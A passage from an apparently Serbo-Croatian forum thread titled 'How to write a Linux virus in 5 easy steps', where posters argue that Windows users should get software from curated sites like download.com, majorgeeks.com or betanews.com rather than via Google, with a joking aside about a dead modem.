nacin da se to rijesi jeste forsiranje sajtova tipa download.com. Submittanje programa je besplatno. Ljudi testiraju submittane programe na shitware. Recimo, ja na FreeBSDu imam ports tree, centralizirani repozitorij softvera. Ako negdje na netu pronadjem program i pise da je za FreeBSD itd, a nema ga u ports stablu, prvo cu malo googlat da vidim zasto ga nitko nije stavio. Uglavnom, poanta je da bi Windowsi trebali imat dva-tri centralizirana web-based repozitorija raznoraznog softwera. Najrizicnija kategorija korisnika su oni koji vole instalirat sve i svasta, tek tako iz radoznalosti. Ako ih se nauci da to "sve i svasta" traze preko download.com a ne preko googlea, postignut je cilj - jer se na takvom sajtu vrti shitware-free softver. Vrlo jednostavno i efektivno rjesenje bez izmisljanja tople vode. Q: HSP56 Micromodem nece da radi kompjuter ga prepozna a kad treba da se konektujem nece ne daje ni znaka zivota. u cemu je problem. A: Crko mozda od grmljavine mozda od spanaca. Uglavnom baci ga u WC solju jako povuci vodu. Skupi 5e i uzmi drugi i ne postuj temu na pogresno mesto. Odgovor na temu

Catch 22 Član broj: 148083 Poruke: 6176 79.101.198.* +21 Profil Re: How to write a Linux virus in 5 easy steps 07.04.2009. u 01:11 - pre 183 meseci Citat: z@re: ...Ako ih se nauci da to "sve i svasta" traze preko download.com a ne preko googlea, postignut je cilj - jer se na takvom sajtu vrti shitware-free softver... Radije to tražim na www.majorgeeks.com ili www.betanews.com nego preko download.com ;) The 11th Hour: The forces blocking change Odgovor na temu